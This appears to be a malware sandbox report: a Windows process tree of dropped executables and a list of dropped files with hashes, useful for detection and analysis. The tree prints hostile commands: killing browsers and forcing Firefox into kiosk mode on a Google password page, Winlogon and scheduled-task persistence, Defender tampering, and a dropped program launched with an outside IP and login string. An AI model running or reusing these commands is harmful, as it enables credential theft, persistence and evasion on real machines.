                                        PID:3796
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2308 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:3812
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2532 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:3924
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2540 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:3932
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1588 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:2
                                        8⤵
                                          PID:3644
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3868 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:8
                                          8⤵
                                            PID:3480
                                      • C:\Users\Admin\AppData\Local\Temp\10168030101\d1deb9a751.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10168030101\d1deb9a751.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:1588
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM firefox.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:764
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM chrome.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1936
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM msedge.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2172
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM opera.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1224
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /IM brave.exe /T
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2692
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                          7⤵
                                            PID:884
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                              8⤵
                                              • Checks processor information in registry
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:2612
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.0.753336387\1122620246" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1036 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af1f3b47-b849-487e-b95a-9c1e79b1e933} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 1340 106d2c58 gpu
                                                9⤵
                                                  PID:1896
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.1.623318347\1691582342" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1532 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2de0aa3-f026-4bfb-8040-d9adcf8d925f} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 1548 ebec258 socket
                                                  9⤵
                                                    PID:916
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.2.649027204\61099573" -childID 1 -isForBrowser -prefsHandle 2140 -prefMapHandle 2136 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37d418fd-48cd-4c0c-ba81-2766ff08aee8} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 2152 19284d58 tab
                                                    9⤵
                                                      PID:608
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.3.606707241\1272150827" -childID 2 -isForBrowser -prefsHandle 2788 -prefMapHandle 2784 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {789a7375-3374-4511-8222-6d1794f02f09} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 2800 1d979458 tab
                                                      9⤵
                                                        PID:2924
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.4.978799730\1515863994" -childID 3 -isForBrowser -prefsHandle 3756 -prefMapHandle 3752 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddbd43ab-e94a-4ae1-be66-20bea81e809a} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 3768 1ec36b58 tab
                                                        9⤵
                                                          PID:972
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.5.523113482\761905324" -childID 4 -isForBrowser -prefsHandle 3888 -prefMapHandle 3892 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5aebc424-cb07-4530-80d0-e3db7a15f950} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 3880 1f7d6158 tab
                                                          9⤵
                                                            PID:1700
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.6.1550244862\1813624862" -childID 5 -isForBrowser -prefsHandle 4044 -prefMapHandle 4048 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {816de81a-fbbe-452f-bd13-7c079d12d41d} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 4036 1fa22858 tab
                                                            9⤵
                                                              PID:3052
                                                      • C:\Users\Admin\AppData\Local\Temp\10168040101\9b50395388.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10168040101\9b50395388.exe"
                                                        6⤵
                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                        • Modifies Windows Defender Real-time Protection settings
                                                        • Modifies Windows Defender TamperProtection settings
                                                        • Modifies Windows Defender notification settings
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Windows security modification
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3360
                                                      • C:\Users\Admin\AppData\Local\Temp\10168050101\6z1l5Yn.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10168050101\6z1l5Yn.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies system certificate store
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3328
                                                      • C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetThreadContext
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4784
                                                        • C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4824
                                                          • C:\Users\Admin\AppData\Roaming\4p0OMTuhea.exe
                                                            "C:\Users\Admin\AppData\Roaming\4p0OMTuhea.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4948
                                                          • C:\Users\Admin\AppData\Roaming\abaMpGYmAU.exe
                                                            "C:\Users\Admin\AppData\Roaming\abaMpGYmAU.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            • Drops file in Windows directory
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4976
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DiwjvcdgoS.bat"
                                                              9⤵
                                                                PID:3876
                                                                • C:\Windows\system32\chcp.com
                                                                  chcp 65001
                                                                  10⤵
                                                                    PID:4120
                                                                  • C:\Windows\system32\PING.EXE
                                                                    ping -n 10 localhost
                                                                    10⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    • Runs ping.exe
                                                                    PID:4128
                                                                  • C:\Windows\DigitalLocker\it-IT\firefox.exe
                                                                    "C:\Windows\DigitalLocker\it-IT\firefox.exe"
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4528
                                                          • C:\Users\Admin\AppData\Local\Temp\10168090101\2b06f6fb99.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168090101\2b06f6fb99.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4368
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 1204
                                                              7⤵
                                                              • Loads dropped DLL
                                                              • Program crash
                                                              PID:4692
                                                          • C:\Users\Admin\AppData\Local\Temp\10168100101\ed16143bb3.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168100101\ed16143bb3.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3792
                                                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                              7⤵
                                                              • Downloads MZ/PE file
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4924
                                                          • C:\Users\Admin\AppData\Local\Temp\10168110101\5aba4d79e5.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168110101\5aba4d79e5.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3828
                                                          • C:\Users\Admin\AppData\Local\Temp\10168120101\ac4788203f.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168120101\ac4788203f.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3620
                                                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4392
                                                          • C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5068
                                                            • C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5108
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5108 -s 1016
                                                                8⤵
                                                                • Program crash
                                                                PID:4220
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 500
                                                              7⤵
                                                              • Loads dropped DLL
                                                              • Program crash
                                                              PID:1108
                                                          • C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4284
                                                            • C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4324
                                                            • C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2784
                                                              • C:\Users\Admin\AppData\Roaming\1j3kLiDowh.exe
                                                                "C:\Users\Admin\AppData\Roaming\1j3kLiDowh.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:320
                                                              • C:\Users\Admin\AppData\Roaming\T9wBxU6hjy.exe
                                                                "C:\Users\Admin\AppData\Roaming\T9wBxU6hjy.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1608
                                                          • C:\Users\Admin\AppData\Local\Temp\10168150101\6z1l5Yn.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168150101\6z1l5Yn.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies system certificate store
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4100
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe,"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              PID:3328
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 7
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:4876
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe,"
                                                                8⤵
                                                                • Modifies WinLogon for persistence
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3268
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\Users\Admin\AppData\Local\Temp\10168150101\6z1l5Yn.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe"
                                                              7⤵
                                                              • Drops startup file
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              PID:4092
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 10
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:3560
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 10
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:3412
                                                          • C:\Users\Admin\AppData\Local\Temp\10168160101\0uzaP1a.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168160101\0uzaP1a.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4936
                                                            • C:\Windows\System32\wscript.exe
                                                              "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"
                                                              7⤵
                                                              • Blocklisted process makes network request
                                                              • Downloads MZ/PE file
                                                              PID:3900
                                                              • C:\Windows\System32\schtasks.exe
                                                                "C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\B892A5C1B94D29B5C3A8FFF4A984794E\64B9C9B9CAF42AE04FA90DF285FF96F6.vbe" /f /rl highest
                                                                8⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:4728
                                                              • C:\Windows\System32\taskkill.exe
                                                                "C:\Windows\System32\taskkill.exe" /f /pid 1092 /t
                                                                8⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4764
                                                              • C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
                                                                "C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf9
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:1548
                                                          • C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3944
                                                            • C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3572
                                                          • C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4044
                                                            • C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4944
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 1028
                                                                8⤵
                                                                • Program crash
                                                                PID:3700
                                                • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                  1⤵
                                                    PID:824
                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                    1⤵
                                                      PID:3916

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\ProgramData\AKEBFCFIJJKKECAKJEHD

                                                      Filesize

                                                      6KB

                                                      MD5

                                                      26115ef17a1dd41762013ed0b05dd952

                                                      SHA1

                                                      065dc32129f996b307d0a6a8e83d038c592c82cc

                                                      SHA256

                                                      777561a61fa579057686fbc1fa0d054da7900adb26abf635ed7b38e33cade4a5

                                                      SHA512

                                                      78e7b1959ec18766cba78b152f6ab644a169982aace0196ed859748e00e2f70a72f702373a01b780b5b674ce7657fc35983d84d3af48ed2911c338cb43bce491

                                                    • C:\Temp\NUnXI0p8x.hta

                                                      Filesize

                                                      779B

                                                      MD5

                                                      39c8cd50176057af3728802964f92d49

                                                      SHA1

                                                      68fc10a10997d7ad00142fc0de393fe3500c8017

                                                      SHA256

                                                      f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                                                      SHA512

                                                      cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                      Filesize

                                                      71KB

                                                      MD5

                                                      83142242e97b8953c386f988aa694e4a

                                                      SHA1

                                                      833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                                      SHA256

                                                      d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                                      SHA512

                                                      bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                      Filesize

                                                      344B

                                                      MD5

                                                      0c1ace0cb49915a3f77b4d704397c55c

                                                      SHA1

                                                      5d4d10f5a0dbe06838ceb136af7ef262425cc298

                                                      SHA256

                                                      62e3fb487c78175ee6227d63b3c7790abf8f70d27595707265d1c4d797792cbd

                                                      SHA512

                                                      35b61c24617d1d58a8be65c194ce4b24638b227128b73cf4dd18005fab2b1126f4c3e60820b6f3e560dfb1c0f79ef808ea4a5b78ec8dbbe0fa817e961d0f0932

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000007.dbtmp

                                                      Filesize

                                                      16B

                                                      MD5

                                                      18e723571b00fb1694a3bad6c78e4054

                                                      SHA1

                                                      afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                      SHA256

                                                      8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                      SHA512

                                                      43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

                                                      Filesize

                                                      16B

                                                      MD5

                                                      aefd77f47fb84fae5ea194496b44c67a

                                                      SHA1

                                                      dcfbb6a5b8d05662c4858664f81693bb7f803b82

                                                      SHA256

                                                      4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

                                                      SHA512

                                                      b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Code Cache\js\index-dir\temp-index

                                                      Filesize

                                                      48B

                                                      MD5

                                                      677696a27287d0e34087335e34bb1fd1

                                                      SHA1

                                                      ef0e7b4f920815a7e677df2c6ab44c67d05e2e39

                                                      SHA256

                                                      5abd0717b8f0a06c266a423ba28eab1c72a965c2b8d4d469aee026fe7d5a2837

                                                      SHA512

                                                      ec09d6c236502119ec72d6557ccd7f579fcc136a7233c4fe8d7541d504180351c074ea7dfaf6d9a081e000ba14eec508abfa0c2719b82401a607d20576524aa7

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\CURRENT

                                                      Filesize

                                                      16B

                                                      MD5

                                                      46295cac801e5d4857d09837238a6394

                                                      SHA1

                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                      SHA256

                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                      SHA512

                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

                                                      Filesize

                                                      264KB

                                                      MD5

                                                      f50f89a0a91564d0b8a211f8921aa7de

                                                      SHA1

                                                      112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                      SHA256

                                                      b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                      SHA512

                                                      bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Site Characteristics Database\000004.dbtmp

                                                      Filesize

                                                      16B

                                                      MD5

                                                      6752a1d65b201c13b62ea44016eb221f

                                                      SHA1

                                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                      SHA256

                                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                      SHA512

                                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Site Characteristics Database\MANIFEST-000001

                                                      Filesize

                                                      41B

                                                      MD5

                                                      5af87dfd673ba2115e2fcf5cfdb727ab

                                                      SHA1

                                                      d5b5bbf396dc291274584ef71f444f420b6056f1

                                                      SHA256

                                                      f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                      SHA512

                                                      de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

